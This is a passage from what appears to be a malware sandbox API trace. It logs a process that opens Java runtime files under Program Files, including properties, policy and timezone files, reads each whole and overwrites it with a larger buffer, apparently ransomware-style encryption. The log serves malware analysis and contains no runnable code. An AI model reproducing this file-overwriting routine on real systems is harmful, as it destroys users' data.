dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.718] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.719] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x500 [0116.719] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.719] ReleaseMutex (hMutex=0x168) returned 1 [0116.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cursors.properties", lpUsedDefaultChar=0x0) returned 18 [0116.719] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f3c8c8, nNumberOfBytesToRead=0x500, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3c8c8*, lpNumberOfBytesRead=0x345f2bc*=0x500, lpOverlapped=0x0) returned 1 [0116.747] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0116.748] WriteFile (in: hFile=0x1dc, lpBuffer=0x2664868*, nNumberOfBytesToWrite=0xa88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesWritten=0x345f2d0*=0xa88, lpOverlapped=0x0) returned 1 [0116.748] CloseHandle (hObject=0x1dc) returned 1 [0116.748] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.749] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.749] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d [0116.749] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.749] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.749] ReleaseMutex (hMutex=0x168) returned 1 [0116.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx.properties", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx.properties", lpUsedDefaultChar=0x0) returned 17 [0116.750] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f8fed8, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f8fed8*, lpNumberOfBytesRead=0x345f2bc*=0x1d, lpOverlapped=0x0) returned 1 [0116.760] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0116.760] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a5, lpOverlapped=0x0) returned 1 [0116.760] CloseHandle (hObject=0x1dc) returned 1 [0116.760] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1082 [0116.762] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0116.762] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.762] ReleaseMutex (hMutex=0x168) returned 1 [0116.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.hprof.txt", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.hprof.txt", lpUsedDefaultChar=0x0) returned 13 [0116.762] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1082, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x345f2bc*=0x1082, lpOverlapped=0x0) returned 1 [0117.554] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.554] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x160a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x345f2d0*=0x160a, lpOverlapped=0x0) returned 1 [0117.555] CloseHandle (hObject=0x1dc) returned 1 [0117.555] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.566] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.566] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbfe [0117.566] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.566] ReleaseMutex (hMutex=0x168) returned 1 [0117.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x1f7328c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.properties", lpUsedDefaultChar=0x0) returned 14 [0117.566] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867db8, nNumberOfBytesToRead=0xbfe, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867db8*, lpNumberOfBytesRead=0x345f2bc*=0xbfe, lpOverlapped=0x0) returned 1 [0117.609] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.609] WriteFile (in: hFile=0x1dc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1186, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f2d0*=0x1186, lpOverlapped=0x0) returned 1 [0117.610] CloseHandle (hObject=0x1dc) returned 1 [0117.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8ce [0117.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.631] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.631] ReleaseMutex (hMutex=0x168) returned 1 [0117.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0117.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.policy", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.policy", lpUsedDefaultChar=0x0) returned 11 [0117.631] ReadFile (in: hFile=0x1cc, lpBuffer=0x289f998, nNumberOfBytesToRead=0x8ce, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x289f998*, lpNumberOfBytesRead=0x345f2bc*=0x8ce, lpOverlapped=0x0) returned 1 [0117.648] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.649] WriteFile (in: hFile=0x1cc, lpBuffer=0x288be48*, nNumberOfBytesToWrite=0xe56, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288be48*, lpNumberOfBytesWritten=0x345f2d0*=0xe56, lpOverlapped=0x0) returned 1 [0117.649] CloseHandle (hObject=0x1cc) returned 1 [0117.649] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41 [0117.748] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.748] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.748] ReleaseMutex (hMutex=0x168) returned 1 [0117.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Abidjan", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Abidjan", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Abidjan", lpUsedDefaultChar=0x0) returned 7 [0117.748] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x345f2bc*=0x41, lpOverlapped=0x0) returned 1 [0117.750] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.750] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0117.750] CloseHandle (hObject=0x1cc) returned 1 [0117.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4d [0117.773] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.773] ReleaseMutex (hMutex=0x168) returned 1 [0117.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bissau", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bissau", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bissau", lpUsedDefaultChar=0x0) returned 6 [0117.774] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fbe8, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fbe8*, lpNumberOfBytesRead=0x345f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0117.775] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.775] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0117.775] CloseHandle (hObject=0x1cc) returned 1 [0117.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.784] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.785] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4d [0117.785] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.785] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.785] ReleaseMutex (hMutex=0x168) returned 1 [0117.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dakar", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dakar", cchWideChar=5, lpMultiByteStr=0x1f7ac9c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dakar", lpUsedDefaultChar=0x0) returned 5 [0117.785] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fbe8, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fbe8*, lpNumberOfBytesRead=0x345f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0117.786] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.786] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0117.787] CloseHandle (hObject=0x1cc) returned 1 [0117.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.811] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.811] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x69 [0117.811] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.811] ReleaseMutex (hMutex=0x168) returned 1 [0117.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Johannesburg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Johannesburg", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Johannesburg", lpUsedDefaultChar=0x0) returned 12 [0117.811] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebba60, nNumberOfBytesToRead=0x69, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebba60*, lpNumberOfBytesRead=0x345f2bc*=0x69, lpOverlapped=0x0) returned 1 [0117.813] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.813] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5f1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5f1, lpOverlapped=0x0) returned 1 [0117.813] CloseHandle (hObject=0x1cc) returned 1 [0117.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0117.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0117.832] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.832] ReleaseMutex (hMutex=0x168) returned 1 [0117.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lome", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0117.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lome", cchWideChar=4, lpMultiByteStr=0x1f7ac9c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lome", lpUsedDefaultChar=0x0) returned 4 [0117.833] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0117.834] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0117.834] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0117.834] CloseHandle (hObject=0x1cc) returned 1 [0117.835] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0118.210] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0118.211] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x49 [0118.211] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0118.211] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.211] ReleaseMutex (hMutex=0x168) returned 1 [0118.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mogadishu", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mogadishu", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mogadishu", lpUsedDefaultChar=0x0) returned 9 [0118.211] ReadFile (in: hFile=0x208, lpBuffer=0x1fac5a8, nNumberOfBytesToRead=0x49, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fac5a8*, lpNumberOfBytesRead=0x345f2bc*=0x49, lpOverlapped=0x0) returned 1 [0118.212] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0118.212] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5d1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5d1, lpOverlapped=0x0) returned 1 [0118.212] CloseHandle (hObject=0x208) returned 1 [0118.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome"), dwDesiredAccess=0xc0000000, 